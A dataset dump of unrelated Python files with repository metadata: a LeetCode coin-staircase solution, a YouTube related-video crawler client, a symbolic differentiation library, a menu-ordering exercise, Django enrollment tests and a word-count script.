d1f84d3f983a27d19f474d4669c972dcfd6b4991 | Python | SLKyrim/vscode-leetcode | /0441.排列硬币.py | UTF-8 | 1,069 | 3.359375 | 3 | [] | no_license | #
# @lc app=leetcode.cn id=441 lang=python3
#
# [441] 排列硬币
#
# https://leetcode-cn.com/problems/arranging-coins/description/
#
# algorithms
# Easy (39.69%)
# Likes: 48
# Dislikes: 0
# Total Accepted: 16.1K
# Total Submissions: 40.1K
# Testcase Example: '5'
#
# 你总共有 n 枚硬币,你需要将它们摆成一个阶梯形状,第 k 行就必须正好有 k 枚硬币。
#
# 给定一个数字 n,找出可形成完整阶梯行的总行数。
#
# n 是一个非负整数,并且在32位有符号整型的范围内。
#
# 示例 1:
#
#
# n = 5
#
# 硬币可排列成以下几行:
# ¤
# ¤ ¤
# ¤ ¤
#
# 因为第三行不完整,所以返回2.
#
#
# 示例 2:
#
#
# n = 8
#
# 硬币可排列成以下几行:
# ¤
# ¤ ¤
# ¤ ¤ ¤
# ¤ ¤
#
# 因为第四行不完整,所以返回3.
#
#
#
# @lc code=start
class Solution:
def arrangeCoins(self, n: int) -> int:
# 等差数列求和,已知和,求数列最后一个数,即层数
return int((-1 + (1 + 8 * n)**0.5) / 2)
# @lc code=end
| true |
49a422de52ded0b4d7ffc37cc89e9962cae55b96 | Python | nickhsu/youtube-crawler | /client/client_fetch_id.py | UTF-8 | 1,926 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env python3
import sys
import httplib2
import time
import json
import urllib
SERVER_URL = 'http://gaisq.cs.ccu.edu.tw:4567'
class YoutubeRelatedFetcher:
def __init__(self):
self.conn = httplib2.Http()
def get_related_id(self, vid):
while True:
try:
res, content = self.conn.request("http://gdata.youtube.com/feeds/api/videos/" + vid + "/related?max-results=50&fields=entry(id)&alt=json")
content = content.decode('utf-8')
break
except:
self.conn = httplib2.Http()
if res.status != 200:
if content.find("too_many_recent_calls") != -1:
#ban by server or no video
raise IOError
else:
return False
else:
data = json.loads(content)
related_id = []
for t in data['feed']['entry']:
related_id.append(t['id']['$t'].split('/')[-1])
return related_id
def get_vids():
conn = httplib2.Http()
resp, content = conn.request("{}/youtube/related_ids/?limit={}".format(SERVER_URL, 100))
if resp.status == 200:
return json.loads(content.decode("utf-8"))
else:
return []
def post_vids(vids):
print("post vids, size = {}".format(len(vids)))
conn = httplib2.Http()
data = {'ids': json.dumps(vids)}
resp, content = conn.request("{}/youtube/ids/".format(SERVER_URL), "POST", urllib.parse.urlencode(data))
def post_vids_fetched(vids):
print("post vids fetched, size = {}".format(len(vids)))
conn = httplib2.Http()
data = {'ids': json.dumps(vids)}
resp, content = conn.request("{}/youtube/related_ids/".format(SERVER_URL), "POST", urllib.parse.urlencode(data))
if __name__ == '__main__':
fetcher = YoutubeRelatedFetcher()
while True:
vids = get_vids()
if len(vids) == 0:
break
related_ids = []
for vid in vids:
try:
tmp = fetcher.get_related_id(vid)
except:
print("sleep")
fetcher = YoutubeRelatedFetcher()
time.sleep(10)
if tmp:
related_ids.extend(tmp)
post_vids(related_ids)
post_vids_fetched(vids)
| true |
e409f8948e9874b11dcc9e0d0247f271d1e8e8dd | Python | drlabos/lflow | /LFlow/labos_flow_v2.py | UTF-8 | 22,625 | 2.890625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 23 14:42:42 2020
@author: sobol
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy.special import expit
"""
for variable names prefer using chars with integer index, e.g. x1, x2, u1
usage of chars or overlapping names (e.g. x and xx) may result in shit,
during replacement of variables with their values
"""
class LabFunc():
"""
for unary & binary pass one or more LabFunc
type basic:
function - callable string
derivatives=gradient - dictionary with partial derivatives
"""
def __init__(*fargs, derivatives=None, args=None, theta=1):
if (len(fargs)==3) and isinstance(fargs[1], str) and isinstance(fargs[2], dict):
"""
e.g.
LabFunc('3*x1', {'x1' : 1})
second argument will be treated as derivatives
"""
fargs[0].type = 'basic'
derivatives = derivatives or fargs[2]
if args:
fargs[0].args = set(args)
elif derivatives:
fargs[0].args = set(derivatives.keys())
else:
fargs[0].args = set()
fargs[0].fun = str(fargs[1])
elif len(fargs) > 2 and isinstance(fargs[1], LabFunc):
"""
e.g.
LabFunc(f1, f2, f3)
"""
fargs[0].type = 'multi'
fargs[0].args = fargs[1].args
for fun in fargs[2:]:
fargs[0].args = fargs[0].args.union(fun.args)
fargs[0].fun = list(fargs[1:])
elif len(fargs) == 2 and isinstance(fargs[1], LabFunc):
"""
e.g.
LabFunc(f1), -f1
"""
fargs[0].type = 'unary'
fargs[0].args = fargs[1].args
fargs[0].fun = fargs[1]
elif isinstance(fargs[1], str) or np.isscalar(fargs[1]):
"""
LabFunc('3*x1', derivatives={'x1' : 1}), LabFunc(5)
"""
fargs[0].type = 'basic'
if args:
fargs[0].args = set(args)
elif derivatives:
fargs[0].args = set(derivatives.keys())
else:
fargs[0].args = set()
fargs[0].fun = str(fargs[1])
else:
fargs[0].type = 'basic'
if fargs[0].type == 'basic':
if '_p_' not in fargs[0].fun:
for arg in fargs[0].args:
fargs[0].fun = fargs[0].fun.replace(arg, '_p_[\'{}\']'.format(arg))
fargs[0].derivatives = derivatives
for arg in fargs[0].derivatives:
if type(fargs[0].derivatives[arg]) != 'str':
fargs[0].derivatives[arg] = str(fargs[0].derivatives[arg])
if '_p_' not in fargs[0].derivatives[arg]:
for arg2 in fargs[0].args:
fargs[0].derivatives[arg] = fargs[0].derivatives[arg].replace(arg2, '_p_[\'{}\']'.format(arg2))
fargs[0].theta = theta
fargs[0].name = ''
def _process_command(self, cmd, x):
if isinstance(x, Point):
for key in x.dict:
cmd = cmd.replace(key, str(x[key]))
elif isinstance(x, dict):
for key in x:
cmd = cmd.replace(key, str(x[key]))
elif isinstance(x, pd.Series):
for key in x.keys():
cmd = cmd.replace(key, str(x[key]))
elif hasattr(x, '__iter__') and (len(self.args) == len(x)):
for i, arg in enumerate(self.args):
cmd = cmd.replace(arg, str(x[i]))
elif len(self.args) == 1:
cmd = cmd.replace(list(self.args)[0], str(x))
return cmd
def __str__(self):
if self.type == 'basic':
return '{}({})'.format(self.name, self.fun)
else:
return str(self.fun)
def __repr__(self):
return str(self)
def _process_arg(self, _p_):
if isinstance(_p_, Point):
return _p_, _p_._size
elif isinstance(_p_, pd.Series):
return _p_, _p_.shape[0]
elif isinstance(_p_, dict):
for k in _p_.keys():
size = 1 if np.isscalar(_p_[k]) else _p_[k].shape[0]
break
return _p_, size
else:
"""
vector passed, try to match variables
may produce unexpected behaviour
but i leave this case to ease the usage of simpliest functions
"""
tmp = _p_
_p_ = {}
if (len(self.args) == 1) and (np.isscalar(tmp)):
_p_[list(self.args)[0]] = tmp
elif hasattr(tmp, '__iter__') and (len(self.args) == len(tmp)):
for i, arg in enumerate(self.args):
_p_[arg] = tmp[i]
return _p_, 1
def __call__(self, _p_):
if self.type == 'basic':
_p_, size = self._process_arg(_p_)
res = eval(self.fun)
if (size>1) and np.isscalar(res):
return res*np.ones((size, 1))
else:
return res
else:
raise NotImplementedError
def deriv(self, _p_, args=None):
if self.type == 'basic':
result = {}
_p_, size = self._process_arg(_p_)
keys = args or self.derivatives.keys()
for arg in keys:
if arg not in self.derivatives:
result[arg] = np.zeros((size, 1))
else:
cmd = self.derivatives[arg]
r = eval(cmd)
if (size > 1) and np.isscalar(r):
result[arg] = r*np.ones((size, 1))
else:
result[arg] = r
return Point(result)
else:
raise NotImplementedError
def __neg__(self):
return LabNeg(self)
def __add__(self, other):
if isinstance(self, LabSum):
if isinstance(other, LabSum):
arg = self.fun + other.fun
return LabSum(*arg)
elif isinstance(other, LabFunc):
arg = self.fun + [other]
return LabSum(*arg)
elif np.isscalar(other):
arg = self.fun + [Constant(other)]
return LabSum(*arg)
elif isinstance(other, LabSum):
arg = [self] + other.fun
return LabSum(*arg)
elif np.isscalar(other):
arg = [self, Constant(other)]
return LabSum(*arg)
else:
arg = [self, other]
return LabSum(*arg)
def __radd__(self, other):
return self + other
def __sub__(self, other):
if isinstance(other, LabFunc):
return LabSubtract(self, other)
elif np.isscalar(other):
return LabSubtract(self, Constant(other))
def __rsub__(self, other):
tmp = -self
return other + tmp
def __mul__(self, other):
if isinstance(self, LabProd):
if isinstance(other, LabProd):
arg = self.fun + other.fun
return LabProd(*arg)
elif isinstance(other, LabFunc):
arg = self.fun + [other]
return LabProd(*arg)
elif np.isscalar(other):
arg = self.fun + [Constant(other)]
return LabProd(*arg)
elif isinstance(other, LabProd):
arg = [self] + other.fun
return LabProd(*arg)
elif np.isscalar(other):
arg = [self, Constant(other)]
return LabProd(*arg)
else:
arg = [self, other]
return LabProd(*arg)
def __rmul__(self, other):
return self*other
def __truediv__(self, other):
if isinstance(other, LabFunc):
return LabDivide(self, other)
elif np.isscalar(other):
return LabDivide(self, Constant(other))
def __rtruediv__(self, other):
if np.isscalar(other):
return LabDivide(Constant(other), self)
def __pow__(self, other):
if np.isscalar(other):
return LabPower(self, Constant(other))
else:
return LabPower(self, other)
def __rpow__(self, other):
if np.isscalar(other):
return LabPower(Constant(other), self)
else:
raise NotImplementedError
class Identity(LabFunc):
"""
identity fuction
mostly used for variables
"""
def __init__(self, arg):
super().__init__(arg, derivatives={arg : 1})
class Constant(LabFunc):
def __init__(self, val):
super().__init__(str(val), derivatives={}, args=[])
class LabNeg(LabFunc):
def __call__(self, p):
return -self.fun(p)
def deriv(self, p, args=None):
return -self.fun.deriv(p, args=args)
def __str__(self):
return '-{}'.format(self.fun)
def __repr__(self):
return str(self)
class LabSum(LabFunc):
def __call__(self, p):
p, size = self._process_arg(p)
if size == 1:
return np.sum([f(p) for f in self.fun])
else:
vals = np.concatenate([f(p).reshape((size, 1)) for f in self.fun], axis=1)
return np.sum(vals, axis=1, keepdims = True)
def deriv(self, p, args=None):
res = self.fun[0].deriv(p, args=args)
for f in self.fun[1:]:
res += f.deriv(p, args=args)
return res
def __str__(self):
return 'sum({})'.format(', '.join([str(f) for f in self.fun]))
def __repr__(self):
return str(self)
class LabSubtract(LabFunc):
def __call__(self, p):
return self.fun[0](p) - self.fun[1](p)
def deriv(self, p, args=None):
return self.fun[0].deriv(p, args=args) - self.fun[1].deriv(p, args=args)
def __str__(self):
return '{} - {}'.format(self.fun[0], self.fun[1])
def __repr__(self):
return str(self)
class LabProd(LabFunc):
def __call__(self, p):
p, size = self._process_arg(p)
if size == 1:
return np.prod([f(p) for f in self.fun])
else:
vals = np.concatenate([f(p).reshape((size, 1)) for f in self.fun], axis=1)
return np.prod(vals, axis=1, keepdims = True)
#return np.prod([f(p) for f in self.fun], axis=0)
def deriv(self, p, args=None):
p, size = self._process_arg(p)
keys = args or self.args
res = Point({arg : 0 for arg in keys})
big_derivs = []
for f in self.fun:
big_derivs.append(f.deriv(p))
if size==1:
vals = np.array([f(p) for f in self.fun])
for arg in keys:
arg_derivs = []
for d in big_derivs:
if arg in d.dict:
arg_derivs.append(d[arg])
else:
arg_derivs.append(0)
arg_derivs = np.array(arg_derivs)
for i in range(len(self.fun)):
tmp = vals.copy()
tmp[i] = arg_derivs[i]
res[arg] = res[arg] + np.prod(tmp)
else:
vals = np.concatenate([f(p).reshape((size, 1)) for f in self.fun], axis=1)
zero_col = np.zeros((size, 1))
for arg in keys:
arg_derivs = []
for d in big_derivs:
if arg in d.dict:
arg_derivs.append(d[arg].reshape((size, 1)))
else:
arg_derivs.append(zero_col)
arg_derivs = np.concatenate(arg_derivs, axis=1)
for i in range(len(self.fun)):
tmp = vals.copy()
tmp[:, i] = arg_derivs[:,i]
res[arg] = res[arg] + np.prod(tmp, axis=1, keepdims=True)
return res
def __str__(self):
return 'prod({})'.format(', '.join([str(f) for f in self.fun]))
def __repr__(self):
return str(self)
class LabDivide(LabFunc):
def __call__(self, p):
return np.divide(self.fun[0](p), self.fun[1](p))
def deriv(self, p, args=None):
return (self.fun[0].deriv(p, args=args)*self.fun[1](p) - self.fun[1].deriv(p, args=args)*self.fun[0](p))/(self.fun[1](p)**2)
if self.fun[1](p) != 0:
return (self.fun[0].deriv(p, args=args)*self.fun[1](p) - self.fun[1].deriv(p, args=args)*self.fun[0](p))/(self.fun[1](p)**2)
else:
"""
create zero point with same coordinates
"""
res = self.fun[0].deriv(p, args=args) + self.fun[1].deriv(p, args=args)
for key in res._keys:
res[key] = np.nan
return res
def __str__(self):
return '{} / {}'.format(self.fun[0], self.fun[1])
def __repr__(self):
return str(self)
class LabPower(LabFunc):
def __call__(self, p):
return np.power(self.fun[0](p), self.fun[1](p))
def deriv(self, p, args=None):
if isinstance(self.fun[0], Constant) and isinstance(self.fun[1], LabFunc):
"""
c^f2(x) -> f2'(x) * log(c) * c^f2(x)
"""
return self.fun[1].deriv(p, args=args)*np.log(self.fun[0](p))*self(p)
elif (not isinstance(self.fun[0], Constant)) and isinstance(self.fun[1], Constant):
"""
f1(x)^c -> c * f1'(x) * f1(x)^c-1
"""
return self.fun[0].deriv(p, args=args) * self.fun[1](p) * np.power(self.fun[0](p), self.fun[1](p) - 1)
else:
part1 = self.fun[0].deriv(p, args=args) * self.fun[1](p) / self.fun[0](p)
part2 = self.fun[1].deriv(p, args=args) * np.log(self.fun[0](p))
return (part1+part2)*self(p)
def __str__(self):
return 'power({}, {})'.format(self.fun[0], self.fun[1])
def __repr__(self):
return str(self)
class LabExp(LabFunc):
def __call__(self, p):
return np.exp(self.fun(p))
def deriv(self, p, args=None):
return self.fun.deriv(p, args=args)*np.exp(self.fun(p))
def __str__(self):
return 'exp({})'.format(self.fun)
def __repr__(self):
return str(self)
class LabLog(LabFunc):
def __call__(self, p):
return np.log(self.fun(p))
def deriv(self, p, args=None):
return self.fun.deriv(p, args=args)/self.fun(p)
def __str__(self):
return 'log({})'.format(self.fun)
def __repr__(self):
return str(self)
class LabCos(LabFunc):
def __call__(self, p):
return np.cos(self.fun(p))
def deriv(self, p, args=None):
return -self.fun.deriv(p, args=args)*np.sin(self.fun(p))
def __str__(self):
return 'cos({})'.format(self.fun)
def __repr__(self):
return str(self)
class LabSin(LabFunc):
def __call__(self, p):
return np.sin(self.fun(p))
def deriv(self, p, args=None):
return self.fun.deriv(p, args=args)*np.cos(self.fun(p))
def __str__(self):
return 'sin({})'.format(self.fun)
def __repr__(self):
return str(self)
class LabArctg(LabFunc):
def __call__(self, p):
return np.arctan(self.fun(p))
def deriv(self, p, args=None):
return self.fun.deriv(p, args=args)/(1 + np.power(self.fun(p), 2))
def __str__(self):
return 'arctg({})'.format(self.fun)
def __repr__(self):
return str(self)
class LabSigmoid(LabFunc):
def __call__(self, p):
#return np.divide(1, 1+np.exp(-self.theta*self.fun(p)))
return expit(self.theta*self.fun(p))
def deriv(self, p, args=None):
return self.theta*self.fun.deriv(p, args=args)*self(p)*(1-self(p))
def __str__(self):
return 'sigmoid({})'.format(self.fun)
def __repr__(self):
return str(self)
class LabIndicator(LabFunc):
def __call__(self, p):
return np.heaviside(self.fun(p), 1)
def deriv(self, p, **kwargs):
return 0
def __str__(self):
return 'I({} > 0)'.format(self.fun)
def __repr__(self):
return str(self)
class LabMax(LabFunc):
def __call__(self, p):
if isinstance(self.fun, list):
p, size = self._process_arg(p)
if size == 1:
return max([f(p) for f in self.fun])
else:
return np.max(np.concatenate([f(p) for f in self.fun], axis=1), axis=1, keepdims=True)
else:
return self.fun(p)
def __str__(self):
return 'max({})'.format(', '.join([str(f) for f in self.fun]))
def __repr__(self):
return str(self)
class LabMin(LabFunc):
def __call__(self, p):
if isinstance(self.fun, list):
p, size = self._process_arg(p)
if size == 1:
return min([f(p) for f in self.fun])
else:
return np.min(np.concatenate([f(p) for f in self.fun], axis=1), axis=1, keepdims=True)
else:
return self.fun(p)
def __str__(self):
return 'min({})'.format(', '.join([str(f) for f in self.fun]))
def __repr__(self):
return str(self)
class LabSmoothmax(LabFunc):
"""
use a little trick here
I do not calc the derivative of smooth maximum
I use smooth version of max derivative
"""
def __call__(self, p):
p, size = self._process_arg(p)
if size == 1:
vals_exp = np.sum([np.exp(self.theta*f(p)) for f in self.fun])
vals_fexp = np.sum([f(p)*np.exp(self.theta*f(p)) for f in self.fun])
return vals_fexp/vals_exp
else:
vals_exp = np.concatenate([np.exp(self.theta*f(p)) for f in self.fun], axis=1)
vals_fexp = np.concatenate([f(p)*np.exp(self.theta*f(p)) for f in self.fun], axis=1)
return np.sum(vals_fexp, axis=1, keepdims=True)/np.sum(vals_exp, axis=1, keepdims=True)
def deriv(self, p, args=None):
p, size = self._process_arg(p)
res = {}
if size==1:
vals_exp = sum([np.exp(self.theta*f(p)) for f in self.fun])
vals_fexp = self.fun[0].deriv(p, args=args)*np.exp(self.theta*self.fun[0](p))
for f in self.fun[1:]:
vals_fexp = vals_fexp + f.deriv(p, args=args)*np.exp(self.theta*f(p))
return vals_fexp/vals_exp
else:
keys = args or self.args
vals_exp = np.sum(np.concatenate([np.exp(self.theta*f(p)) for f in self.fun], axis=1), axis=1, keepdims=True)
for key in keys:
vals_fexp = np.concatenate([f.deriv(p, args=[key])[key]*np.exp(self.theta*f(p)) for f in self.fun], axis=1)
res[key] = np.sum(vals_fexp, axis=1, keepdims=True)/vals_exp
return Point(res)
def __str__(self):
return 'Smoothmax({})'.format(', '.join([str(f) for f in self.fun]))
def __repr__(self):
return str(self)
class LabSmoothmin(LabFunc):
"""
use a little trick here
I do not calc the derivative of smooth maximum
I use smooth version of max derivative
"""
def __call__(self, p):
p, size = self._process_arg(p)
if size == 1:
vals_exp = np.sum([np.exp(-self.theta*f(p)) for f in self.fun])
vals_fexp = np.sum([f(p)*np.exp(-self.theta*f(p)) for f in self.fun])
return vals_fexp/vals_exp
else:
vals_exp = np.concatenate([np.exp(-self.theta*f(p)) for f in self.fun], axis=1)
vals_fexp = np.concatenate([f(p)*np.exp(-self.theta*f(p)) for f in self.fun], axis=1)
return np.sum(vals_fexp, axis=1, keepdims=True)/np.sum(vals_exp, axis=1, keepdims=True)
def deriv(self, p, args=None):
p, size = self._process_arg(p)
res = {}
if size==1:
vals_exp = sum([np.exp(-self.theta*f(p)) for f in self.fun])
vals_fexp = self.fun[0].deriv(p, args=args)*np.exp(-self.theta*self.fun[0](p))
for f in self.fun[1:]:
vals_fexp = vals_fexp + f.deriv(p, args=args)*np.exp(-self.theta*f(p))
return vals_fexp/vals_exp
else:
keys = args or self.args
vals_exp = np.sum(np.concatenate([np.exp(-self.theta*f(p)) for f in self.fun], axis=1), axis=1, keepdims=True)
for key in keys:
vals_fexp = np.concatenate([f.deriv(p, args=[key])[key]*np.exp(-self.theta*f(p)) for f in self.fun], axis=1)
res[key] = np.sum(vals_fexp, axis=1, keepdims=True)/vals_exp
return Point(res)
def __str__(self):
return 'Smoothmin({})'.format(', '.join([str(f) for f in self.fun]))
def __repr__(self):
return str(self)
if __name__ == '__main__':
from labos_point import Point
p1 = Point({'x1' : 1, 'x2' : 1})
p2 = Point({'x1' : 2, 'x2' : 3})
f1 = LabFunc('3*x1+2', derivatives={'x1' : '3'})
f2 = LabFunc('np.sin(x1)', derivatives={'x1' : 'np.cos(x1)'})
f3 = LabFunc('x1**2 - 2*x1*x2', derivatives={'x1': '2*x1 - 2*x2', 'x2' : '-2*x2'})
t2 = LabExp(f1)
t3 = LabLog(t2)
t4 = LabCos(f2+f3)
t5 = LabSin(f1+f2)
t6 = LabSigmoid(f1+f2-f3)
smax = LabSmoothmax(f1, f2, theta=10)
smin = LabSmoothmin(f1, f2, theta=10)
xs = np.arange(-3, 3, 0.01)
### | true |
500e4f3a64a36cec105b44160ca544a2ccfe8c7b | Python | koukoou/space_2 | /test_copy/test6.py | UTF-8 | 1,109 | 4.0625 | 4 | [] | no_license | class MenuItem:
def __init__(self, name, price):
self.name = name
self.price = price
def info(self):
return self.name + ': ¥' + str(self.price)
def get_total_price(self, count):
total_price = self.price * count
if 3<=count:
total_price*=0.9
return round(total_price)
menu_item1 = MenuItem('サンドイッチ', 500)
menu_item2 = MenuItem('チョコケーキ', 400)
menu_item3 = MenuItem('コーヒー', 300)
menu_item4 = MenuItem('オレンジジュース', 200)
menu_items = [menu_item1, menu_item2, menu_item3, menu_item4]
index = 0
for item in menu_items:
print(str(index) + '. ' + item.info())
index += 1
print('--------------------')
order = int(input('メニューの番号を入力してください: '))
selected_menu = menu_items[order]
print('選択されたメニュー: ' + selected_menu.name)
count=int(input('個数を入力してください(3つ以上で1割引): '))
result=selected_menu.get_total_price(count)
print('合計は'+str(result)+'円です')
| true |
f586c928ff0373f3d260debcd33e9d3d27494d61 | Python | ravipol2542/.html | /register/regis/tests/test_model.py | UTF-8 | 1,317 | 2.640625 | 3 | [] | no_license | from django.test import TestCase
from ..models import Student,Course
# Create your tests here.
class CourseTestCase(TestCase):
def setUp(self):
#createStudent
s1 = Student.objects.create(sName="Jamie Vardy", sID="6110612998")
s2 = Student.objects.create(sName="Michael Owen",sID="6110613004")
s3 = Student.objects.create(sName="Oliver Kahn",sID="6110613104")
#createCourse
a1=Course.objects.create(cID="CN201",cName="DATA I",cYear="2020",cTerm=2,avaiable_seat=1, )
a2=Course.objects.create(cID="CN202",cName="DATA II",cYear="2020",cTerm=2,avaiable_seat=2,)
def test_enroll_Total(self):
a = Course.objects.get(cID="CN201")
s = Student.objects.get(sName="Jamie Vardy")
a.attendStd.add(s)
self.assertEqual(a.attendStd.count(),1)
def test_enroll_status(self):
a = Course.objects.get(cID="CN202")
s1 = Student.objects.get(sName="Jamie Vardy")
s2 = Student.objects.get(sName="Michael Owen")
a.attendStd.add(s1)
a.attendStd.add(s2)
a.status = a.seatCheck()
self.assertFalse(a.status)
def test_seat_left(self):
a = Course.objects.get(cID="CN201")
s1 = Student.objects.get(sName="Jamie Vardy")
a.attendStd.add(s1)
self.assertEqual(int(a.seatLeft()),0)
| true |
edc4509364f91f0fb8d5bf57ef0ffeab4e1ee35d | Python | Nmazil-Dev/PythonCrashCoursePractice | /More Exercises/10-10.py | UTF-8 | 154 | 3.234375 | 3 | [] | no_license | #common words
filename = 'book.txt'
with open(filename) as f_obj:
words = f_obj.read()
print (words)
print (words.lower().count('the'))
| true |